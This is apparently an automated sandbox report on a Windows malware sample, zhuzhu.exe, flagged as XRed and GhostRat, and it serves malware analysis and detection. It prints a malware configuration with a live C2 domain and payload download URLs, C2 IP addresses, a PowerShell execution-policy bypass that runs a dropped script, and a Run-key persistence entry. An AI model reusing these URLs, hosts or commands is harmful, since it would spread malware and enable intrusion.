Windows Analysis Report
zhuzhu.exe

Overview

General Information

Sample name: zhuzhu.exe
Analysis ID: 1582239
MD5: 675f03db23d403573a3a6f708a0e4369
SHA1: 78ee9afafe6bf18d2c42d816629b6f9ed1e3ea2f
SHA256: ee4c8a187e1e1bd62abe49faece1f327dc7718c736dd1e427c025d73fa796cf8
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

GhostRat, XRed
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected XRed
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries disk data (e.g. SMART data)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • zhuzhu.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\zhuzhu.exe" MD5: 675F03DB23D403573A3A6F708A0E4369)
    • ._cache_zhuzhu.exe (PID: 3624 cmdline: "C:\Users\user\Desktop\._cache_zhuzhu.exe" MD5: B4F00FBA3327488D4CB6FD36B2D567C6)
      • ._cache_zhuzhu.exe (PID: 6340 cmdline: "C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe" MD5: B4F00FBA3327488D4CB6FD36B2D567C6)
        • cmd.exe (PID: 7476 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 3068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7604 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7488 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7616 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • Synaptics.exe (PID: 5780 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 382B0F88502E718DFDF96DBC3AA3400A)
      • WerFault.exe (PID: 9100 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7284 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 12156 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 5448 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • splwow64.exe (PID: 7364 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • inst.exe (PID: 7448 cmdline: C:\Users\user\Downloads\inst.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • inst.exe (PID: 7556 cmdline: C:\Users\user\Downloads\inst.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)
  • Synaptics.exe (PID: 7980 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 382B0F88502E718DFDF96DBC3AA3400A)
  • cleanup
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source | Rule | Description | Author | Strings
zhuzhu.exe | JoeSecurity_XRed | Yara detected XRed | Joe Security
zhuzhu.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
zhuzhu.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | JoeSecurity_XRed | Yara detected XRed | Joe Security
C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\ProgramData\Synaptics\RCXE77E.tmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
C:\ProgramData\Synaptics\RCXE77E.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

Source | Rule | Description | Author | Strings
00000001.00000002.1772641629.0000000000403000.00000020.00000001.01000000.00000005.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
00000001.00000000.1664705656.00000000006F9000.00000008.00000001.01000000.00000005.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_XRed | Yara detected XRed | Joe Security
00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

Source | Rule | Description | Author | Strings
1.2.._cache_zhuzhu.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
0.0.zhuzhu.exe.400000.0.unpack | JoeSecurity_XRed | Yara detected XRed | Joe Security
0.0.zhuzhu.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0.0.zhuzhu.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
1.0.._cache_zhuzhu.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security

System Summary

Source: Process started; Author: frack113; Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7476, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 7604, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\zhuzhu.exe, ProcessId: 6652, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7476, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 7604, ProcessName: powershell.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 5780, TargetFilename: C:\Users\user\AppData\Local\Temp\FHfEA7As.xlsm
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T04:59:11.886897+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 118.107.44.219 | 19091 | TCP
2024-12-30T05:00:28.548302+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49785 | 118.107.44.219 | 19091 | TCP
2024-12-30T05:01:45.453960+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 50264 | 118.107.44.219 | 19091 | TCP
2024-12-30T05:02:54.328175+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 50265 | 118.107.44.219 | 19092 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T04:59:08.668250+0100 | 2832617 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 69.42.215.252 | 80 | TCP

AV Detection

Source: zhuzhu.exe, Avira: detected
Source: http://xred.site50.net/syn/SSLLibrary.dlD, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rarh, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SUpdate.ini, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rar, Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/SSLLibrary.dll, Avira URL Cloud: Label: malware
Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\ProgramData\Synaptics\RCXE77E.tmp, Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCXE77E.tmp, Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: zhuzhu.exe, Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
Source: C:\ProgramData\Synaptics\Synaptics.exe, ReversingLabs: Detection: 92%
Source: zhuzhu.exe, Virustotal: Detection: 83%
Source: zhuzhu.exe, ReversingLabs: Detection: 92%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 99.4% probability
Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe, Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCXE77E.tmp, Joe Sandbox ML: detected
Source: zhuzhu.exe, Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\._cache_zhuzhu.exe, Unpacked PE file: 1.2.._cache_zhuzhu.exe.400000.0.unpack
Source: zhuzhu.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                                      Source: Binary string: \Release\Code_Shellcode.pdb source: ._cache_zhuzhu.exe, ._cache_zhuzhu.exe, 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                                      Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: inst.exe, 00000007.00000003.1803199164.0000000003C95000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp, 360P2SP.dll.7.dr
                                      Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.dr
                                      Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.dr
                                      Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.dr
                                      Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: ._cache_zhuzhu.exe, 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                                      Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: inst.exe, 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 00000007.00000000.1759892249.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 0000000C.00000000.1770278594.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 0000000C.00000002.1778901612.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                      Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.dr
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: z:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: x:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: v:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: t:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: r:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: p:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: n:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: l:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: j:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: h:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: f:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: b:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: y:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: w:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: u:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: s:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: q:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: o:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: m:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: k:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: i:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: g:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: e:
                                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: c:
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeFile opened: [:
                                      Source: zhuzhu.exe, 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                                      Source: zhuzhu.exe, 00000000.00000000.1657184118.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                                      Source: Synaptics.exe, 00000002.00000003.1744249799.00000000005FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                      Source: zhuzhu.exeBinary or memory string: [autorun]
                                      Source: zhuzhu.exeBinary or memory string: autorun.inf
                                      Source: ~$cache1.2.drBinary or memory string: [autorun]
                                      Source: ~$cache1.2.drBinary or memory string: autorun.inf
                                      Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                                      Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001BD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,7_2_001BD71E
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001CD670 _memset,FindFirstFileW,FindNextFileW,FindClose,7_2_001CD670
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001C3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_001C3FB0
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F52A6BA _wcspbrk,__getdrive,FindFirstFileW,_wcspbrk,__wfullpath_helper,_wcslen,GetDriveTypeW,___loctotime64_t,__wsopen_s,__fstat64i32,__close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_5F52A6BA
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001CD670 _memset,FindFirstFileW,FindNextFileW,FindClose,12_2_001CD670
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001BD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,12_2_001BD71E
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001C3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_001C3FB0
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_037780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,4_2_037780F0
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                      Source: C:\Users\user\Desktop\zhuzhu.exeFile opened: C:\Users\user\AppData
                                      Source: excel.exeMemory has grown: Private usage: 2MB later: 68MB

                                      Networking

                                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49766 -> 118.107.44.219:19091
                                      Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.4:49743 -> 69.42.215.252:80
                                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49785 -> 118.107.44.219:19091
                                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50264 -> 118.107.44.219:19091
                                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50265 -> 118.107.44.219:19092
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49738 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49744 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49756 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49759 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49750 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49764 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49746 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49782 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49754 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49781 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49776 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49794 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49787 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49770 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49772 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49778 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49786 -> 142.250.181.238:443
                                      Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.4:49739 -> 142.250.181.238:443
                                      Source: Malware configuration extractorURLs: xred.mooo.com
                                      Source: global trafficTCP traffic: 118.107.44.219 ports 18852,8853,19092,19091,3,5,8
                                      Source: unknownDNS query: name: freedns.afraid.org
                                      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 118.107.44.219:8853
                                      Source: global trafficUDP traffic: 192.168.2.4:28470 -> 1.192.136.170:3478
